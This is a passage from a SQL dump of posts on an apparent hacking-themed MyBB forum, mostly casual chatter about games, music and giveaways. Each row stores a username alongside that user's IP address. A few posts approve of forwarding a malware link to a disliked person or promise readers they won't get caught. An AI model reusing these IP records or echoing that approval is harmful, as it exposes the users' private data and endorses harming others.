you want to do it or not.\r\n\r\nMe: Thinking if I should ask this girl out on a date or not but she is short but she got good boobs.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '71d1e94182de10aa77df23cc1033d062', '0', '0'); INSERT INTO mybb_posts VALUES('4295', '817', '4281', '7', 'RE: Favorite Quote?', '0', '61', 'NXK', '1350007164', 'veni, vici, vidi \n\nI came, I saw, I conquered.\nOne of my all time favorite pics\n[img]http://www.onestopmuscle.co.uk/wp-content/uploads/2011/09/Arnold-Conquer-1.jpg[/img]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '3cbe45808887a938f030a9255f5d46a0', '0', '0'); INSERT INTO mybb_posts VALUES('4296', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '3', '??????????¢™', '1350012806', 'Well here is my one last goodbye. GOODBYE SEE YOU NEVER!!', '75.38.19.52', '1260786484', '1', '0', '3', '1350012828', '1', '2df03798e67d72ecf38463ec1bf8c8ca', '0', '1350012828'); INSERT INTO mybb_posts VALUES('4297', '729', '4230', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1350013559', '[quote=\'iTzIpod\' pid=\'4230\' dateline=\'1349955720\']\r\nMy friend got infected. And I almost clicked on the link.\r\n\r\nBut then I just copied it and gave it to someone on Facebook that doesn\'t like me. And I don\'t like him either. So I think he clicked on it not sure..\r\n\r\nBut I knew it was a Hotfile.com link.\r\n[/quote]\r\n\r\nOh okay well if he did good for you.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '4db21d929943e9802b9c926797da027d', '0', '0'); INSERT INTO mybb_posts VALUES('4298', '804', '4209', '42', 'RE: Ninja caught in US Airport', '0', '205', 'mothered', '1350014479', 'My goodness, just when you thought you\'ve seen It all, then this happens.\r\n\r\nWho knows what his Intentions were.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'dd6196bbf9401b822b645d0e8fd409e8', '0', '0'); INSERT INTO mybb_posts VALUES('4299', '810', '4259', '64', 'RE: Good website\'s for Movie\'s to Watch', '0', '205', 'mothered', '1350014564', 'An excellent list Indeed mate.\r\n\r\nThanking you.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9645ad20289b3b76c818fe4edfa1caad', '0', '0'); INSERT INTO mybb_posts VALUES('4300', '717', '3644', '12', 'RE: How to Bruteforce VPS!', '0', '205', 'mothered', '1350014940', 'Very well documented and Illustrated mate.\r\n\r\nAppreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '8adbde768c18e7e1db76e3632d16a36b', '0', '0'); INSERT INTO mybb_posts VALUES('4301', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '205', 'mothered', '1350015283', 'I do a lot of web-based coding, so Javascript, CSS, and HTML.\r\n\r\nA bit of VB too.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ed040c26eff44d9006f38942957d0688', '0', '0'); INSERT INTO mybb_posts VALUES('4302', '822', '0', '47', 'Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '17', '228', 'VirtualLegend', '1350029946', '[[align=center][b][color=#32CD32][size=xx-large]Huge Graphics Pack Worth $2.400 | GIVEAWAY |[/size][/color][/b][/align]\r\n\r\n[align=center][color=#FFFFFF][size=medium]Hello LH Members,\r\n\r\nI\'m Back with a new GIVEAWAY. Today i have a Huge Ultimate Graphics pack that 10 times better is than the Ninja Kit. The graphics is about 2.400 dollars worth and that is alot of money.\r\n\r\nHow do you get it?\r\nFirst Leave a Post behind that you want the Graphics pack. (You can post 100 times it doesn\'t matter)\r\n\r\nAfter a Week I will choose a 10 random Members in the comments and i will send them the graphics pack\r\n\r\n[size=large][color=#FFD700]Thats All It\'s very EASY[/color][/size][/size][/color][/align]\r\n\r\n[align=center][size=xx-large][color=#FF4500]Download Link:\r\n[code]https://www.dropbox.com/sh/sk4oba3aiypp155/fUfpNxHlEv[/code][/color][/size][/align]\r\n\r\n[align=center][img]https://s3.amazonaws.com/GraphicsMystic/wso3/wso1_01.jpg[/img][/align]\r\n[align=center][img]https://s3.amazonaws.com/GraphicsMystic/wso3/13wso2_02.jpg[/img][/align]\r\n[align=center][img]https://s3.amazonaws.com/GraphicsMystic/wso3/13wso1_03.jpg[/img][/align]\r\n[align=center][img]https://s3.amazonaws.com/GraphicsMystic/wso3/wso4_03.jpg[/img][/align]\r\n[align=center][img]https://s3.amazonaws.com/GraphicsMystic/wso3/13wso3_01.jpg[/img][/align]', '81.18.248.110', '1360197742', '1', '0', '228', '1350595392', '1', 'f31d65361b27332e0f8a7d29f192dcb4', '0', '1350595392'); INSERT INTO mybb_posts VALUES('4303', '810', '4259', '64', 'RE: Good website\'s for Movie\'s to Watch', '0', '62', 'R?????zo?', '1350031148', 'Thanks for the feedback, really great sites.', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', '66955df83531d7d3afe04f37f74bce4e', '0', '0'); INSERT INTO mybb_posts VALUES('4304', '817', '4295', '7', 'RE: Favorite Quote?', '0', '62', 'R?????zo?', '1350031929', '[quote=\'NXK\' pid=\'4295\' dateline=\'1350007164\']\r\nveni, vici, vidi \r\n\r\nI came, I saw, I conquered.\r\nOne of my all time favorite pics\r\n[img]http://www.onestopmuscle.co.uk/wp-content/uploads/2011/09/Arnold-Conquer-1.jpg[/img]\r\n[/quote]\r\n\r\nVeni, vici, vidi\r\nHow could i forget that one.', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', '43b0b75aed945f8f7d68c9d8bb3c0070', '0', '0'); INSERT INTO mybb_posts VALUES('4305', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '62', 'R?????zo?', '1350032070', 'Thinking about engage with my girlfriend, but thinking it\'s too early :/', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', 'e33412992cf5953c3a87632ff232362a', '0', '0'); INSERT INTO mybb_posts VALUES('4306', '823', '0', '8', 'Fifa 11 Soundtracks', '10', '228', 'VirtualLegend', '1350032389', '[align=center][color=#32CD32][size=medium]Hello,\r\n\r\nI was playing Fifa 11 yesterday and what i was questioning what for music track Fifa had. If you play Fifa 11 and you love a song at the game and don\'t know the name of the song. Watch the Video Below\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=o4LotLxlFuA[/video]\r\n\r\nPeace OUT[/size][/color][/align]', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '91ea097ef987e381cb6c5918afd76761', '0', '0'); INSERT INTO mybb_posts VALUES('4307', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1350033081', 'Thanks t3h jok3r.\nFor others, feel free to apply.', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', '80291b428c987b4328b8eb8c127d1ad6', '0', '0'); INSERT INTO mybb_posts VALUES('4308', '823', '4306', '8', 'RE: Fifa 11 Soundtracks', '0', '62', 'R?????zo?', '1350033148', 'Yeah I loved the songs back then, thanks mate.', '5.158.61.162', '94256546', '1', '0', '62', '1350033233', '1', '0309279b57dabeae31b91532a41989d9', '0', '1350033233'); INSERT INTO mybb_posts VALUES('4309', '817', '4281', '7', 'RE: Favorite Quote?', '0', '53', 'sirchamp', '1350035048', 'Alea iacta est. From Julius Caesar', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '6d51f2248db2f519723f6d719ecf5cc3', '0', '0'); INSERT INTO mybb_posts VALUES('4310', '824', '0', '4', 'Glowing Here!', '0', '253', 'GlowingCapes', '1350035669', 'Hey guys! GlowingCapes here, and I\'m new to LH. I hope to bring more discussions to the less-active forums like gaming and graphics :D Well.. that\'s basically all I have to say today. Hope to meet some of you. See you all around!', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '4d1c9b43ce6509b4218f081c0b38421f', '0', '0'); INSERT INTO mybb_posts VALUES('4311', '238', '1021', '56', 'RE: Ban the user above you', '0', '253', 'GlowingCapes', '1350035797', 'Banned for having a good sig.. o.O', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', 'c3ee2039af04f972b923d3ded942423e', '0', '0'); INSERT INTO mybb_posts VALUES('4312', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '253', 'GlowingCapes', '1350035862', 'I dupe on Minecraft (xbox) and bot on Runescape. I think that\'s about it.\n\nEdit: And Cod 5 Zombies, classic :P', '173.76.159.245', '-1387487243', '0', '0', '253', '1350037178', '1', '985917f7b8c17381d3933fe368374434', '0', '1350037178'); INSERT INTO mybb_posts VALUES('4313', '692', '3518', '71', 'RE: COD Black OPs or COD MW3?', '0', '253', 'GlowingCapes', '1350036034', 'Well, they\'re basically 2 different CoD\'s. It matters what kind of gameplay I\'m going for to pick on which one I\'m playing. But I mostly only play Zombies on Black Ops.', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '9eefb5c09c4f71cc704bd9188ac1813c', '0', '0'); INSERT INTO mybb_posts VALUES('4314', '815', '4267', '73', 'RE: your favourite iOS games', '0', '253', 'GlowingCapes', '1350036113', 'My favorite game is Subway Surfers at the moment. It\'s pretty fun once you get the hang of it but very repetitive so you can\'t play it for hours on end.', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '67f7ba624ea3e0d3b9eb0a88ff1a8216', '0', '0'); INSERT INTO mybb_posts VALUES('4315', '815', '4314', '73', 'RE: your favourite iOS games', '0', '62', 'R?????zo?', '1350036300', '[quote=\'GlowingCapes\' pid=\'4314\' dateline=\'1350036113\']\r\nMy favorite game is Subway Surfers at the moment. It\'s pretty fun once you get the hang of it but very repetitive so you can\'t play it for hours on end.\r\n[/quote]\r\n\r\nI will give this game a shot, the reason I created this thread is so I could download new games :P', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', '605283a9331fda164cf6d7404c4b4a9f', '0', '0'); INSERT INTO mybb_posts VALUES('4316', '824', '4310', '4', 'RE: Glowing Here!', '0', '62', 'R?????zo?', '1350036353', 'Welcome to the community, stay active and HQ :)', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', '16c4912351545db7edc9b1188e907377', '0', '0'); INSERT INTO mybb_posts VALUES('4317', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '62', 'R?????zo?', '1350036471', 'What do you expect when you ask on a Hacking forum if people hack games, 99% will say yes I think :P', '5.158.61.162', '94256546', '1', '0', '0', '0', '1', 'a21dbd92903710b18493cc5d028b17ba', '0', '0'); INSERT INTO mybb_posts VALUES('4318', '815', '4315', '73', 'RE: your favourite iOS games', '0', '253', 'GlowingCapes', '1350037108', '[quote=\'R?????zo?\' pid=\'4315\' dateline=\'1350036300\']\n[quote=\'GlowingCapes\' pid=\'4314\' dateline=\'1350036113\']\nMy favorite game is Subway Surfers at the moment. It\'s pretty fun once you get the hang of it but very repetitive so you can\'t play it for hours on end.\n[/quote]\n\nI will give this game a shot, the reason I created this thread is so I could download new games :P\n[/quote]\n\nYeah, I figured that when you saw it. Do you have any games that you like to play long-term? I need one like that, haven\'t had one in a while.', '173.76.159.245', '-1387487243', '0', '0', '253', '1350037120', '1', '2a2878a9919bd5486285714cb136f38b', '0', '1350037120'); INSERT INTO mybb_posts VALUES('4319', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '253', 'GlowingCapes', '1350037546', 'I mostly listen to Rap and Dupstep. I just don\'t know about any other music that\'s good for my likings D:', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '2b9d4b610ff2daa9a5ece50134a3dcc1', '0', '0'); INSERT INTO mybb_posts VALUES('4320', '825', '0', '8', 'Favorite Rappers?', '0', '253', 'GlowingCapes', '1350037699', 'Hey guys. I\'ve been listening to the same rappers constantly (Meek Mill, Wiz Khalifa, and I guess Tyga is rap? I don\'t know) and I need a new one. Anyone have a really good rapper that isn\'t well known or something? Thanks.\n\n\n(Do not reply to this topic saying someone like Lil\' Wayne .. :o, perhaps not a commercial rapper at all?)', '173.76.159.245', '-1387487243', '0', '0', '253', '1350037714', '1', 'da16ca82fd5145a61d1a1e489f58116a', '0', '1350037714'); INSERT INTO mybb_posts VALUES('4321', '238', '1021', '56', 'RE: Ban the user above you', '0', '53', 'sirchamp', '1350038210', 'Banned for beeing new...:O', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f56e5675e1866602751033e53d0e7da7', '0', '0'); INSERT INTO mybb_posts VALUES('4322', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350043602', 'http://www.youtube.com/watch?v=9_YT2igOAHM&feature=b-cat-comedy', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '070bb6bccaf1623912fda49f871c42c5', '0', '0'); INSERT INTO mybb_posts VALUES('4323', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '53', 'sirchamp', '1350043640', 'Nice e-book. The layout isnt the best but the content is the thing that matters.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '2d47096605b1d53d03d81eaa55100b61', '0', '0'); INSERT INTO mybb_posts VALUES('4324', '486', '2353', '56', 'RE: Guess how many?', '0', '205', 'mothered', '1350044106', 'I never would\'ve thought It was so many.\r\n\r\nNice one.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e0eae4864acdcd37a09e494c5c532efe', '0', '0'); INSERT INTO mybb_posts VALUES('4325', '826', '0', '7', 'L33T Hacking Tinychat Room', '0', '100', '??zg???g????61', '1350054899', 'Hello everyone, I made a Tinychat room for ANY members to talk to each other on. The link is- http://tinychat.com/63pcw members of l33t hacking should NOT give this out, as this is for our members only. If someone that isn\'t a l33t hacking member joins I will have to ban them. Alright well I hope to see you all on there ;)', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '1a8b21f2dcbf89f119b8afe0c1a81056', '0', '0'); INSERT INTO mybb_posts VALUES('4326', '827', '0', '76', 'Playstation names', '0', '254', 'Greed', '1350057570', 'So I was wondering if any of you have a playstation 3, and if yeah do well you could post your psn so people can add you or what ever. I\'ll go first My Psn is EpicTacoTime.', '63.153.255.202', '1067057098', '0', '0', '0', '0', '1', '16bc4644ef359b7ba89ae6e0364e1776', '0', '0'); INSERT INTO mybb_posts VALUES('4327', '828', '0', '71', 'Planetary Anhiliation', '0', '254', 'Greed', '1350058074', 'Basically this a new and upcoming Rts game, It looks pretty awesome\r\n [video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=FhEYvOYceNs[/video]\r\n\r\nYeah if you watched the video up above, then check out their site to pre order or to help them with money. They done other great games you probably heard of like well i cant think of any right now lol. \r\nhttp://www.kickstarter.com/projects/659943965/planetary-annihilation-a-next-generation-rts \r\nBut go their and it will tell you all about the game and what not and doodling mcdads there. Sorry if posting a link is against the rules, if it is I\'ll take it down.', '63.153.255.202', '1067057098', '0', '0', '0', '0', '1', '946881d2d76d8f077b93003839364619', '0', '0'); INSERT INTO mybb_posts VALUES('4328', '829', '0', '74', 'Adventure Quest Worlds', '0', '254', 'Greed', '1350058283', 'Does any one play this game, It\'s pretty awesome I brought membership for 3 months. It pretty much a mmorpg in your browser. There is a ton of classes to choose from like right now, im a evolved Shaman just go it yesterday. They recently put in guilds I think so if anyone wants to play just type in Aq in google. \r\n\r\nAlso my name in game is Toki The ArchAngel.', '63.153.255.202', '1067057098', '0', '0', '0', '0', '1', '56c54225a3ec0766b5a6aa5deae8f2e3', '0', '0'); INSERT INTO mybb_posts VALUES('4329', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '61', 'NXK', '1350058548', 'I have before, I used to own a few servers for it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '0f10ae2c222793e247825c7956c06c1a', '0', '0'); INSERT INTO mybb_posts VALUES('4330', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '61', 'NXK', '1350058666', 'Since I\'ve played counter-strike for so long I hate hackers, I even pay to play on cheat free servers monthly.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c262130f5d7083960ec1fd095e684291', '0', '0'); INSERT INTO mybb_posts VALUES('4331', '830', '0', '8', 'Feathery wings - Voltaire', '0', '254', 'Greed', '1350058812', 'Hey guys, Im bring You a video featuring Voltaire\'s song Feathery Wings.\r\n[video=youtube]http://www.youtube.com/watch?v=9oMxckcYTg8&feature=bf_prev&list=AL94UKMTqg-9A5HfWPCzJ6qYjWkG_Jg3pV[/video]\r\n\r\nI just love this song I don\'t know why, Just give it a chance.', '63.153.255.202', '1067057098', '0', '0', '0', '0', '1', 'bfe12c68d01bb8cfd71a339515e63840', '0', '0'); INSERT INTO mybb_posts VALUES('4332', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '254', 'Greed', '1350059459', 'All you need to know that I game when ever I can, which is basically off work so that basically everyday. Yep that\'s my application. Also I play for fun, never for serious like everyone one on cod, that\'s why I troll em lol. Yeah either accept me or deny me, don\'t matter to me.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'cf14bb17b8ae34764df08f79c45d7643', '0', '0'); INSERT INTO mybb_posts VALUES('4333', '678', '4079', '29', 'RE: Get Free Domain names & Webhosting Packages e-Book [Written by me!]', '0', '172', 'MistaCode', '1350060722', '[quote=\'??????????¢™\' pid=\'4079\' dateline=\'1349823195\']\r\nThanks for the E-Book but im not going to try it, too risky.\r\n[/quote]\r\n\r\nI can guarantee you wont get caught doing this ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'f97b074a7e1a24ea3b0a79d5e9860c07', '0', '0'); INSERT INTO mybb_posts VALUES('4334', '831', '0', '7', 'Join My GIVEAWAY', '0', '228', 'VirtualLegend', '1350064195', '[align=center][color=#32CD32][size=medium]Hello LH Members,\r\n\r\nI have recently posted a thread where you can make chance on a Huge Ultimate Graphics Pack That around 2.400 dollars is Worth.\r\n\r\nI will choose 10 random members in the comments. To win the Graphics Pack you need to post that you want to Pack.\r\n\r\nI have not a single post on my thread, so if you\'re intrested check the link below\r\n\r\n(For more info)\r\nThread: http://l33thacking.net/thread-822.html\r\n\r\nSorry for my bad English :P[/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '200102f9c751eb1967d9f25a0aa3ceda', '0', '0'); INSERT INTO mybb_posts VALUES('4335', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '253', 'GlowingCapes', '1350067492', 'I like it, looks awesome. Nice job!', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '1be9ac0c696dc1c623b37d9f7fca2722', '0', '0'); INSERT INTO mybb_posts VALUES('4336', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '100', '??zg???g????61', '1350068460', 'I have an Indev account ;) I\'ve owned it for a while but I only play if someone asks me to play with them. Otherwise I don\'t find it very fun.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '8a438bfa6a80b62f7c95d9040ba5de24', '0', '0'); INSERT INTO mybb_posts VALUES('4337', '486', '2353', '56', 'RE: Guess how many?', '0', '253', 'GlowingCapes', '1350068512', '26! That\'s all I found in the 30 seconds I spent looking at it. :P Haha, I only missed like 14.. (only..)', '173.76.159.245', '-1387487243', '0', '0', '253', '1350068597', '1', 'c1232bb8395abd29932217192e300e99', '0', '1350068597'); INSERT INTO mybb_posts VALUES('4338', '487', '4232', '56', 'RE: Corrupt a wish', '0', '62', 'R?????zo?', '1350071488', '[quote=\'iTzIpod\' pid=\'4232\' dateline=\'1349955825\']\r\nGranted but your house burned to the ground + the $1,000,000,000.\r\n\r\nI wish I was Rainbow Dash <3\r\n[/quote]\r\n\r\ngranted but turns out you look more like Justin Bieber.\r\n\r\nI wish I had more then 1billion dollars.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3e1223b35de2f1d0e4496c9a67fc48ba', '0', '0'); INSERT INTO mybb_posts VALUES('4339', '487', '2354', '56', 'RE: Corrupt a wish', '0', '232', 'BreShiE', '1350078538', 'Granted, but now you don\'t know who\'s your real friends, or who\'s you friend just for your money.\n\nI wish famine to be ridden from the world.', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', '6274cf56ad431b6a807b3ca5fa62291c', '0', '0'); INSERT INTO mybb_posts VALUES('4340', '826', '4325', '7', 'RE: L33T Hacking Tinychat Room', '0', '222', 'Exposé', '1350080355', 'Can\'t people easily see this link lol?', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', '796234691b146dc97705fb905e8d48e2', '0', '0'); INSERT INTO mybb_posts VALUES('4341', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '222', 'Exposé', '1350080456', 'Thanks dude. Took me like 2 min', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', '9ea9eb84f37a5c3a560f51039c721da2', '0', '0'); INSERT INTO mybb_posts VALUES('4342', '824', '4310', '4', 'RE: Glowing Here!', '0', '222', 'Exposé', '1350080748', 'Sup glowing thanks or joining the site :)', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', '8ddb2de7d98961d02bc48c6eeb3a6c84', '0', '0'); INSERT INTO mybb_posts VALUES('4343', '824', '4310', '4', 'RE: Glowing Here!', '0', '3', '??????????¢™', '1350080789', 'Welcome to LH, Hope you have a great time here.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c320629bcd6e8a0ac2a9b70ec393504a', '0', '0'); INSERT INTO mybb_posts VALUES('4344', '804', '4209', '42', 'RE: Ninja caught in US Airport', '0', '222', 'Exposé', '1350080817', 'Haha I would have paid to see this with my own eyes', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', '7178c24ecce4a3109cc264e1961e819e', '0', '0'); INSERT INTO mybb_posts VALUES('4345', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '222', 'Exposé', '1350080873', 'I\'ll join this giveaway sure :). Looks nice', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', 'a53101f83c3a9f55a562c05e0dc74e51', '0', '0'); INSERT INTO mybb_posts VALUES('4346', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '249', 'Ultimatum', '1350091295', '^ Seems legit LOL. You said you got it off HF. Now it\'s another site?', '121.223.26.30', '2044664350', '1', '0', '0', '0', '1', '12d9380e7f609a0cb1b289145989b000', '0', '0'); INSERT INTO mybb_posts VALUES('4347', '826', '4325', '7', 'RE: L33T Hacking Tinychat Room', '0', '1', 't3h jok3r', '1350092176', 'L33THacking does not and will not have any official chatroom(s) and moved to the right section because such announcements belong in this section.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2c95f1c8c249999a51eb83d3d9977561', '0', '0'); INSERT INTO mybb_posts VALUES('4348', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '82', 'iTzIpod', '1350092697', 'Good bye NeonLights.\nWe lost 1 HQ & Active Member.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1725209523408a58237788bb55bb827d', '0', '0'); INSERT INTO mybb_posts VALUES('4349', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '82', 'iTzIpod', '1350092749', 'Kinda LQ post ^ Just saying.\nBut oh well. Post is a post.\nBoosts forum activity.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e8ff826d2994f20423a8371f7623e01f', '0', '0'); INSERT INTO mybb_posts VALUES('4350', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1350092788', 'I\'ll apply. Do I still gotta fill out the form? Even though I was the Original Leader of Unique?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5088a4b80504f4671e44c195db3ab3ab', '0', '0'); INSERT INTO mybb_posts VALUES('4351', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1350092844', 'I like your taste in Music! ;)\n\nRap + Dubstep :3\n\nAlso, it\'s not Dupstep. It\'s Dubstep. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7784b6244fea2e63b15d3913939dd987', '0', '0'); INSERT INTO mybb_posts VALUES('4352', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '82', 'iTzIpod', '1350092876', 'Wiz Khalifa & Drake, don\'t remember anyone else :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ecb528075ad7400da9c7e561af909e05', '0', '0'); INSERT INTO mybb_posts VALUES('4353', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1350092905', 'Banned for being Sirchamp .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4b1931137fdcfe099bcbded7e1106d5', '0', '0'); INSERT INTO mybb_posts VALUES('4354', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1350092944', 'I know. I\'m sorry about not making it fancy :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c4e8c8f1c5655c6e4cbb3766157d36e8', '0', '0'); INSERT INTO mybb_posts VALUES('4355', '827', '4326', '76', 'RE: Playstation names', '0', '82', 'iTzIpod', '1350092976', 'Seems OG :p\n\nLool\nI\'ll add you tomorrow or so. If I can remember.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '552059f17ab772857c9d06592f858207', '0', '0'); INSERT INTO mybb_posts VALUES('4356', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '100', '??zg???g????61', '1350093008', 'Uh sorry not sure I understand what your trying to say..', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'b478edd3cc003cf4b321c81829923606', '0', '0'); INSERT INTO mybb_posts VALUES('4357', '826', '4325', '7', 'RE: L33T Hacking Tinychat Room', '0', '82', 'iTzIpod', '1350093061', 'Not looking forward to this..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '52c7c249cf7cd8b624a1d8a476747e61', '0', '0'); INSERT INTO mybb_posts VALUES('4358', '826', '4347', '7', 'RE: L33T Hacking Tinychat Room', '0', '100', '??zg???g????61', '1350093076', '[quote=\'t3h jok3r\' pid=\'4347\' dateline=\'1350092176\']\r\nL33THacking does not and will not have any official chatroom(s) and moved to the right section because such announcements belong in this section.\r\n[/quote]\r\n\r\nI know, just a place for anyone that wants to to talk. :)', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'c1e9ccd9138378948d7a41aac333d212', '0', '0'); INSERT INTO mybb_posts VALUES('4359', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '2', 'Apathy', '1350093099', 'Bye it is too bad to see a active member go.', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '091c937f6c526a86106b81aedad49e3d', '0', '0'); INSERT INTO mybb_posts VALUES('4360', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350093158', 'Lool.\nI play this game.\nWell, I\'m kinda inactive now.\nI was never a member. I wish I was though :p\nI have NO AC tokens.\nUmm\nI\'m level 40 or 35 or 30 or 45. (That\'s very specific) :p\nI don\'t remember I didn\'t log in for a long time.\nI heard you gotta be Member or so just to make a guild which kinda sucks.\nI think my name was iTzIpod.\nNot sure. \n\nTry looking at my character page.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '513fb38ceef9687fe156285ef045a630', '0', '0'); INSERT INTO mybb_posts VALUES('4361', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '82', 'iTzIpod', '1350093240', 'Can we play tomorrow @GRON\n\n?\n\nAlso,\nYou guys should make a Server \n\nCalled LHCraft or L33tCraft.\nI don\'t know.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f6ca174cfc73e01778c8ac895a7833fb', '0', '0'); INSERT INTO mybb_posts VALUES('4362', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350093853', 'I am a guardian I have not played in years though. Level like 66 or something.', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '09c2f53bc8541a48e9a5f2c809dd2124', '0', '0'); INSERT INTO mybb_posts VALUES('4363', '822', '4345', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '228', 'VirtualLegend', '1350094309', '[quote=\'ƒ???????????g\' pid=\'4345\' dateline=\'1350080873\']\r\nI\'ll join this giveaway sure :). Looks nice\r\n[/quote]\r\n\r\nWelcome to the GIVEAWAY :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '89aa1965dbcbb8041407fbcabe224295', '0', '0'); INSERT INTO mybb_posts VALUES('4364', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '2', 'Apathy', '1350094458', 'I would love this hope I get it. :P', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '13c34ed341531fad93d3661800c981c4', '0', '0'); INSERT INTO mybb_posts VALUES('4365', '827', '4326', '76', 'RE: Playstation names', '0', '1', 't3h jok3r', '1350098316', 'This guy is real and I invited him to L33Thacking.\n\nThanks for joining.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b54c73f2c1add0fbe13cdfa303ad707', '0', '0'); INSERT INTO mybb_posts VALUES('4366', '190', '4322', '56', 'RE: Copy and paste game', '0', '4', 'Triple H', '1350098681', '[quote=\'Anonymous™\' pid=\'4322\' dateline=\'1350043602\']\r\nhttp://www.youtube.com/watch?v=9_YT2igOAHM&feature=b-cat-comedy\r\n[/quote]\r\n\r\nYou got an english version?\r\n\r\nhttp://forumtopsites.net/index.php?a=in&u=joker', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9dd29e57c575c0647d6af40d41bdf4c8', '0', '0'); INSERT INTO mybb_posts VALUES('4367', '804', '4209', '42', 'RE: Ninja caught in US Airport', '0', '4', 'Triple H', '1350098834', 'How did he even departure with all those?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '065002a215134c0734a0056c78475ad1', '0', '0'); INSERT INTO mybb_posts VALUES('4368', 